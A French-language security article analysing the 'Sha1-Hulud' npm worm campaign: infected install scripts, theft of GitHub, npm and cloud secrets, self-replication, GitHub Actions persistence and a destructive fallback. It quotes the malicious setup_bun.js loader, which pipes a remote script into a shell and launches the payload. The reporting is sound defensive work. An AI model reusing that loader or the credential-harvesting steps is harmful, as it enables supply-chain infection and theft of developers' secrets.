Contexte : pourquoi ce type dattaque est pertinent
Lécosystème npm est immense : des millions de paquets, de nombreuses dépendances transversales, et une grande part de confiance implicite envers les mainteneurs et les versions. Cette confiance est devenue une cible privilégiée pour les acteurs malveillants : en compromettant un paquet diffusé largement, ils peuvent infecter de nombreuses applications en aval, directement ou indirectement.
Lincident original nommé Shai‑Hulud (sans le « 1 ») avait déjà été documenté précédemment : une fonction d'auto-réplication et de propagation dans lécosystème npm, avec vol de jetons, des insertions de workflows GitHub malveillants, etc. La nouvelle vague, Sha1-Hulud, reprend et amplifie ces techniques.
Le fait que la dernière campagne soit ciblée « par la chaîne dapprovisionnement logicielle » (software supply chain) la rend dautant plus critique : ici, ce ne sont pas seulement des utilisateurs finaux ou des organisations spécifiques qui sont visés, mais potentiellement tous les projets reposant sur un des paquets compromis.
Une attaque qui rappelle la fragilité de lécosystème JavaScript
Lécosystème npm est devenu un symbole de vitesse et defficacité, mais aussi de vulnérabilité. La multiplication des dépendances, les scripts dinstallation automatiques, labsence de vérification systématique du code publié : autant de portes ouvertes pour des campagnes malveillantes de plus en plus industrielles. Shai-Hulud, déjà connu pour une première vague particulièrement agressive, démontre une nouvelle fois à quelle vitesse une attaque supply-chain peut contaminer un environnement qui repose sur la confiance plus que sur le contrôle.
Dans cette seconde offensive, plus de 300 paquets ont été modifiés pour inclure du code malveillant. La contamination sest ensuite propagée aux projets qui les utilisent, pour atteindre des dizaines de milliers de dépôts GitHub en quelques heures.
Selon HelixGuard, la campagne a vu ses paquets malveillants être publiés entre le 21 et le 23 novembre 2025.
Envoyé par HelixGuard
« Notre système de surveillance interne a détecté plusieurs paquets infectés contenant ce qui semble être une version évoluée du logiciel malveillant "Shai-Hulud". Les premières analyses montrent un comportement de propagation de type ver qui infecte automatiquement d'autres paquets gérés par les développeurs concernés. Plus grave encore, nous avons découvert que le logiciel malveillant contient un mécanisme de "commutateur d'homme mort" qui menace de détruire les données des utilisateurs si ses canaux de propagation et d'exfiltration sont coupés ».
Comment la contamination sopère : anatomie dun ver npm moderne
Lattaque repose sur une mécanique huilée, qui combine vol de secrets, propagation automatique et exploitation des plateformes de développement.
Un script dinstallation comme porte dentrée
Le cur de lattaque réside dans les scripts « postinstall » insérés dans les paquets infectés. Lorsquun développeur installe la dépendance, un fichier JavaScript obfusqué sexécute automatiquement.
Ce script scanne lenvironnement local à la recherche de secrets :
- jetons npm,
- clés GitHub (PATs),
- identifiants AWS/GCP/Azure,
- variables denvironnement sensibles,
- fichiers de configuration cloud.
Ces secrets permettent ensuite au malware de rebondir sur dautres surfaces : création de dépôts GitHub, interactions avec les workflows, déploiement dagents malveillants, etc.
Auto-réplication par infection des comptes npm compromis
Si le script trouve un jeton npm valide, il modifie automatiquement les paquets gérés par ce compte. Il insère le code malveillant dans la nouvelle version, puis publie le paquet mis à jour comme sil sagissait dune release légitime. Ce mécanisme transforme lattaque en ver : chaque compte compromis amplifie la propagation en infectant ses propres bibliothèques.
Manipulation des workflows GitHub pour persister
Nouvel élément inquiétant : le malware crée ou modifie des workflows GitHub Actions pour maintenir un accès permanent. Il installe un runner auto-hébergé portant un nom spécifique, ajoute des workflows capables dexécuter des commandes à distance et crée parfois des dépôts publics pour exfiltrer les données dérobées.
Capacité destructive en cas déchec
Lorsque le ver narrive pas à voler des secrets exploitables, il déclenche parfois un volet destructeur. Dans certains scénarios observés, il supprime le répertoire personnel de la machine ou efface des configurations essentielles, transformant une attaque de vol en attaque de sabotage.
GitLab résume l'attaque de cette manière :
Envoyé par GitLab
Pourquoi cette campagne est plus dangereuse que la première
Si la première offensive Shai-Hulud avait déjà marqué les esprits, cette nouvelle vague va plus loin sur plusieurs aspects :
Une propagation plus rapide et plus profonde
Lutilisation combinée de npm, GitHub et des runners CI donne à lattaque une portée « transversale » : elle touche non seulement le développement local, mais aussi les pipelines de build et les environnements dintégration.
Une palette dobjectifs élargie
Le premier Shai-Hulud se concentrait surtout sur le vol de jetons.
Celui-ci ajoute :
- la destruction de données ;
- la prise de contrôle persistante via CI/CD ;
- la réplication autonome ;
- la contamination silencieuse décosystèmes entiers.
Une meilleure dissimulation
Les scripts malveillants sont plus compacts, mieux obfusqués et sexécutent à travers des chemins dinstallation courants. Beaucoup passent inaperçus dans les outils de détection statique classiques.
Vecteur d'infection initial
Le logiciel malveillant s'infiltre dans les systèmes grâce à un processus de chargement en plusieurs étapes soigneusement élaboré. Les paquets infectés contiennent un fichier package.json modifié avec un script de préinstallation pointant vers setup_bun.js. Ce script de chargement semble inoffensif, prétendant installer le runtime JavaScript Bun, qui est un outil légitime. Cependant, son véritable objectif est d'établir l'environnement d'exécution du logiciel malveillant.
// Ce fichier est ajouté aux paquets de la victime sous le nom setup_bun.js. #!/usr/bin/env node async function downloadAndSetupBun() { // Téléchargements et installations bun let command = process.platform === 'win32' ? 'powershell -c "irm bun.sh/install.ps1|iex"' : 'curl -fsSL https://bun.sh/install | bash'; execSync(command, { stdio: 'ignore' }); // Exécute le logiciel malveillant proprement dit. runExecutable(bunPath, ['bun_environment.js']); }
Le chargeur setup_bun.js télécharge ou localise le runtime Bun sur le système, puis exécute la charge utile bun_environment.js intégrée, un fichier obscurci de 10 Mo déjà présent dans le package infecté. Cette approche offre plusieurs niveaux de contournement : le chargeur initial est petit et semble légitime, tandis que le code malveillant réel est fortement obscurci et intégré dans un fichier trop volumineux pour être inspecté de manière informelle.
Collecte d'identifiants
Une fois exécuté, le logiciel malveillant commence immédiatement à rechercher des identifiants dans plusieurs sources :
- Jetons GitHub : recherche dans les variables d'environnement et les configurations CLI GitHub les jetons commençant par ghp_ (jeton d'accès personnel GitHub) ou gho_(jeton OAuth GitHub)
- Identifiants cloud : énumère les identifiants AWS, GCP et Azure à l'aide des SDK officiels, en vérifiant les variables d'environnement, les fichiers de configuration et les services de métadonnées
- Jetons npm : extrait les jetons pour la publication de paquets à partir des fichiers .npmrc et des variables d'environnement, qui sont des emplacements courants pour stocker en toute sécurité les configurations et les identifiants sensibles.
- Analyse du système de fichiers : télécharge et exécute Trufflehog, un outil de sécurité légitime, pour analyser l'ensemble du répertoire d'accueil à la recherche de clés API, de mots de passe et d'autres secrets cachés dans les fichiers de configuration, le code source ou l'historique git.
Réseau d'exfiltration de données
Le logiciel malveillant utilise des jetons GitHub volés pour créer des référentiels publics avec une mention spécifique dans leur description : « Sha1-Hulud : The Second Coming ». Ces référentiels servent de boîtes de dépôt pour les identifiants et les informations système volés.
Si le jeton GitHub initial ne dispose pas des autorisations suffisantes, le logiciel malveillant recherche d'autres référentiels compromis portant le même marqueur, ce qui lui permet de récupérer les jetons d'autres...
